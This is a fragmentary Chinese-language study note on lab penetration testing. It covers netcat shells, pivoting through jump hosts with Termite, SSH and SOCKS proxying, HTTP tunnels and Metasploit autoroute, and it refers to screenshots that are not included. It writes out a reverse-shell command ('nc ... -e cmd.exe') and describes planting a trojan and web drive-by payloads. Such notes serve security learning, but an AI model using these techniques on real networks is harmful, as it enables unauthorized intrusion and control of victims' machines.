CS的下载

纵向渗透：NC 瑞士军刀菜刀是一个hyyp协议         NC是TCP

NC连接后没有任何回显

先受控房  nc.exe -l -p 12345

然后攻击方  nc.exe ip port 12345

扫描端口

上传和 nc.exe 同一目录下的文件

跳板机工具和NC的实际操作以及Termite联合管理

和nc是一样的先开监听 要先把agent对应系统文件上传到目标然后运行  然后我们的机子就是用命令连接 但是根据网络拓扑图 我们现实情况要更复杂些  接下来我将解释为什么复杂

首先目标机获取shell 使用命令 uname -r 输出操作系统信息看看版本

然后找到对应版本然后将我们的agent文件上传上去

1.物理机连接03  这是第一个被我们趁虚而入的机子 我们可以

nc -nvv 可以显示机子的详细信息、

当然这是对面没有防火墙的方法现实中 我们要利用对面的shell 我们通过对面主动连接我们然后我们再操控对面 看第二点使用的命令

2.我们物理机

nc -l -p 12345

然后服务器:

nc 192.168.0.106 12345 -t -e cmd.exe 这样就是对面服务器通过防火墙主动连接我们

这样我们是控制对面的shell

3.接下来我们物理机输入几个命令 就能这样 物理机 -> 03 -> 07 -> 最深的渗透目标

首先

然后

show查看我们连接上的是不是03

然后goto 1 代表我们进入03跳板机里面    

然后连07

goto3 就是进入win7

然后我们用7连最后的红帽我们最终的目标

上传文件的命令

SSH的正向代理

现在先开始搭建环境

我们把03网段修改为

将03的8001端口转发到本地

root@ip 是用红帽的ip  我们用红帽的用户发送命令给03让03把ssh的端口映射给我们本地物理机

把自己本地的ip映射上去作用是 只有红帽才能入侵内网的机器

将红帽当成VPS

我们将自己的payload写好后 端口映射给红帽

当机器找我们这个红帽端口80 就会访问我们的网页 

我们可以进行网页挂马

反向连接上面就是

SSH配置socket代理

用ssh -D 连接完后如下图步骤 修改conf

将socks4 改为我们映射的端口

然后执行命令利用红帽扫描内网信息

linux反弹shell

常见的http隧道 下面这几个都是工具

什么时候用隧道

防火墙的内网里 服务器链接数据库 我怎么怎么把数据库的东西交给我们物理机 就需要使用隧道

主要还是为了做端口转发

二一个是不能出网不能和MSF建立会话

网上找攻略搜索HTTP隧道端口转发

实战才能累计经验

重点！！MSF网络穿越

首先03当做我们获取的第一个肉机也就是跳板机 他是80

03有个win7 我们渗透玩win7

win7还有红帽 

红帽处于有两个网段

一个和 win7 03 一样的 80 同时win7还有个10现在我们要渗透20网段

详细解释如图

把1.exe 也就是木马文件放在被攻击的网站上

依次如下图tab找到对应漏洞

 

最终示例是这个漏洞

以下是ppt内容是总的教程

得到shell后 使用模块shell命令后使用ipconfig

查询ip

发现了多了一个20网段 同时有2个网段 一个是80 一个 是20

然后我们先在80网段连接10网段 10网段是一个路由的网段

利用

run autoroute 控制路由

先获取 然后给我们的控制好的shell机子添加这个10网段的路由

添加好自己的网段身份后我们用 MSF port查找模块 来进行信息收集

加好了之后我们也可以尝试使用nmap

添加socks代理 进行扫描所有子网段

set老大这里没有set什么直接run了 有需要可以网上搜一下这个命令需要修改什么

run后我们 在另一个终端使用 vi 命令 修改如图的文件（刚刚改过）

然后我们把下图8081端口修改为1080

然后就可以如下命令使用nmap扫描